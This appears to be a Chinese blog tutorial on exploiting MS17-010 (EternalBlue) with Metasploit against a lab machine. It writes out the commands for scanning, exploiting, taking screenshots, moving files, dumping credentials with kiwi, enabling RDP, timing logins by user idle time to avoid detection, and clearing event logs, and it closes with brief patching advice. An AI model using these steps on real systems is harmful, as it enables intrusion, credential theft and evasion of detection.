首页 > 其他分享 >ms17-010

ms17-010

时间:2023-04-17 20:47:24浏览次数:51  
标签:010 漏洞 ms17 模块 meterpreter smb

用nmap的漏洞扫描模式

nmap --script=vuln 192.168.178.128

可以发现,靶机上扫到了4个漏洞,其中包括了MS17-010。

 

打开metasploit(msf很有意思的是,每次打开都会显示不同的画面。)

msfconsole

 搜索ms17-010相关模块,可以看到一共找到了6个不同的模块。(选项:0-5)

search ms17-010

 加载扫描模块。(选项1)

use auxiliary/scanner/smb/smb_ms17_010

查看配置选项

show options

 RHOSTS显示远程主机未配置,配置目标主机。

开始扫描漏洞,再次证实靶机存在MS17-010漏洞。

 使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue
并设置攻击载荷:

 查看选项并设置rhosts:

 输入exploit(run)开始攻击。

 运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

捕获屏幕     meterpreter > screenshot

 

 

上传/下载文件

meterpreter > upload hello.txt c://

 meterpreter > download d://1.txt

 

 获取用户密码

meterpreter > load kiwi

Loading extension kiwi...Success.

Kiwi在32位系统中能够正常使用,到了64位系统中需要用到进程迁移http://hackdig.com/09/hack-144260.htm

完成进程迁移后:

meterpreter > creds_all

 启用远程桌面,配合上一步获取到的密码。

meterpreter > run post/windows/manage/enable_rdp

使用时一般配合查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。登录rdp会把对方顶掉。

 

meterpreter > idletime

 清除日志

meterpreter > clearev

修复方案

  • 关闭445端口。
  • 打开防火墙,安装安全软件。
  • 安装对应补丁。

 

标签:010,漏洞,ms17,模块,meterpreter,smb
From: https://www.cnblogs.com/fandt/p/17327424.html

相关文章

  • zynq7010,petalinux, USB-wifi测试
    zynq7010,基于linux验证USB-wifi功能1.相关电路图,这里貌似复位键默认上电开启的,引脚并没有印出来需要注意的地方注意芯片型号"USB3320",这个在linux内核中如果USB配置正确的话是会被打印出来的usbcore:registerednewinterfacedriverusb-storagechipidea-us......
  • vs 2010项目转成 2008
    *.csproj*.resx*.sln把11.0改成10.0版本把4.0改成3.5去掉app.config中的.NET版本,就可以不生成*..exe.config中的必需版本信息直接在项目中去掉app.config就不会生成配置文件了删除*..exe.config文件中的.NET版本配置......
  • 团体天梯练习 L2-010 排座位
    L2-010排座位布置宴席最微妙的事情,就是给前来参宴的各位宾客安排座位。无论如何,总不能把两个死对头排到同一张宴会桌旁!这个艰巨任务现在就交给你,对任何一对客人,请编写程序告诉主人他们是否能被安排同席。输入格式:输入第一行给出3个正整数:\(N(≤100)\),即前来参宴的宾客总人数,则......
  • P3205 [HNOI2010]合唱队
    P3205[HNOI2010]合唱队区间DP——取一端思:根据题意我们发现,每次排队的时候,会出现两种情况当前排入的人(即初始队列最后一人)比初始队列中前一个人矮,排到最左边当前排入的人(同上)比初始队列中前一个人高,排到最右边可从初始队列最后一人切入。设置状态:\(f[l][r][0/1]\)......
  • 23.4.15 NOIP2010提高游记
    第一次做提高,之前做的都是普及,还是感觉挺难的,心态有点裂开。1.机器翻译这题首先一看就是一道模拟题目,要注意的是字典的内存问题,在超内存以后要减1,直接上代码:-),时间复杂度O(n)1#include<bits/stdc++.h>2#pragmaGCCopzimize(3)3usingnamespacestd;4inlinelon......
  • Excel 2010 快捷键
    Excel2010中的键盘快捷方式全部隐藏本文介绍按键提示的定义以及它们用于访问功能区的方式。本文还列出了Ctrl组合快捷键、功能键和一些其他MicrosoftExcel常用快捷键。 注释   如果您使用的是MicrosoftExcelStarter2010,请注意,并非所有列出的Excel功能在Excel......
  • 010.用户管理
    用户管理添加用户useraddbob添加用户bobuseradd-d/home/tomhometom添加用户tom并为tom指定家目录/home/tomhome指定、修改密码Passwdbob修改账户bob的密码删除用户userdelbob......
  • 安装wsl的必备操作——开启CPU虚拟化——WslRegisterDistribution failed with error_
    参考:https://www.cnblogs.com/smdtxz/p/16837946.htmlhttps://www.cnblogs.com/wenonly/p/17206040.htmlhttps://blog.csdn.net/qq_41460654/article/details/118026986  ======================================================  因为实验室需要炼丹,而炼丹要用ubun......
  • Flash加密解密(三)——特殊混淆让asv2010解析代码失败
    1.Flash加密解密(一)——doswf混淆还原2.Flash加密解密(二)——Doswf生成代码分析3.Flash加密解密(三)——特殊混淆让asv2010解析代码失败从前面两节的分析可以看出,脆弱的swf文件极其容易被一些现成的工具反编译回可执行源代码。一旦可以进行动态调试,那么这个文件将被他人掌控,即使你使用......
  • 360看图 1.0.0.1010 精简优化版
    修改历史:2023.03.30:自改官方 1.0.0.1010最新正式版本2023.03.20:首个自改官方1.0.0.1002修改内容:基于官方最新版本制作,精简部分非必要文件;禁止软件自动更新;去除所有程序自校验,避免程序报错;其他细节调整下载链接: 自用资源,暂不公开!......